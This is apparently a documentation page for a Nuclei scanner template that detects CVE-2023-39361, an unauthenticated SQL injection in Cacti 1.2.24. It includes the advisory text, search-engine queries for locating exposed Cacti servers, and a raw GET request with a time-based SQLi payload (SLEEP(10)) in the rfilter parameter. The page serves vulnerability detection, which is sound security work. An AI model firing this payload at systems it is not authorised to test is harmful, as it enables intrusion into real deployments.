Cacti 1.2.24 - SQL Injection
ID: CVE-2023-39361
Severity: critical
Author: ritikchaddha
Tags: time-based-sqli,cve2023,cve,cacti,sqli
Description
Section titled “Description”Cacti is an open source operational monitoring and fault management framework. Affected versions are subject to a SQL injection discovered in graph_view.php. Since guest users can access graph_view.php without authentication by default, if guest users are being utilized in an enabled state, there could be the potential for significant damage. Attackers may exploit this vulnerability, and there may be possibilities for actions such as the usurpation of administrative privileges or remote code execution. This issue has been addressed in version 1.2.25. Users are advised to upgrade. There are no known workarounds for this vulnerability.
YAML Source
Section titled “YAML Source”id: CVE-2023-39361
info: name: Cacti 1.2.24 - SQL Injection author: ritikchaddha severity: critical description: | Cacti is an open source operational monitoring and fault management framework. Affected versions are subject to a SQL injection discovered in graph_view.php. Since guest users can access graph_view.php without authentication by default, if guest users are being utilized in an enabled state, there could be the potential for significant damage. Attackers may exploit this vulnerability, and there may be possibilities for actions such as the usurpation of administrative privileges or remote code execution. This issue has been addressed in version 1.2.25. Users are advised to upgrade. There are no known workarounds for this vulnerability. impact: | Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data manipulation, or data leakage. reference: - https://github.com/Cacti/cacti/security/advisories/GHSA-6r43-q2fw-5wrg - https://nvd.nist.gov/vuln/detail/CVE-2023-39361 - https://lists.fedoraproject.org/archives/list/[email protected]/message/CFH3J2WVBKY4ZJNMARVOWJQK6PSLPHFH/ - https://lists.fedoraproject.org/archives/list/[email protected]/message/WZGB2UXJEUYWWA6IWVFQ3ZTP22FIHMGN/ - https://lists.fedoraproject.org/archives/list/[email protected]/message/WOQFYGLZBAWT4AWNMO7DU73QXWPXTCKH/ classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2023-39361 cwe-id: CWE-89 epss-score: 0.233 epss-percentile: 0.9655 cpe: cpe:2.3:a:cacti:cacti:1.2.24:*:*:*:*:*:*:* metadata: verified: true max-request: 1 vendor: cacti product: cacti shodan-query: - title:"Login to Cacti" - http.title:"login to cacti" - http.title:"cacti" - http.favicon.hash:"-1797138069" fofa-query: - icon_hash="-1797138069" - title="cacti" - title="login to cacti" google-query: - intitle:"cacti" - intitle:"login to cacti" tags: time-based-sqli,cve2023,cve,cacti,sqli
http: - raw: - | @timeout: 20s GET /graph_view.php?action=tree_content&node=1-1-tree_anchor&rfilter=%22or+%22%22%3D%22%28%28%22%29%29%3BSELECT+SLEEP%2810%29%3B--+- HTTP/1.1 Host: {{Hostname}}
matchers: - type: dsl dsl: - 'duration>=10' - 'status_code == 200' - 'contains_all(body, "Tree Mode", "cacti")' condition: and# digest: 4a0a00473045022100a4ae41445b3d1fd5ed2aa6d341fc592d5199256b27adfbb595914cdccaffab72022060b8e67855be56e5f00cdd5093db9d7d5248a6d75d72f67ad5e541d3d516f040:922c64590222798bb761d5b6d8e72950Guide to check the vulnerabilities
Section titled “Guide to check the vulnerabilities”This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.
$ nuclei -u "URL" -t "http/cves/2023/CVE-2023-39361.yaml"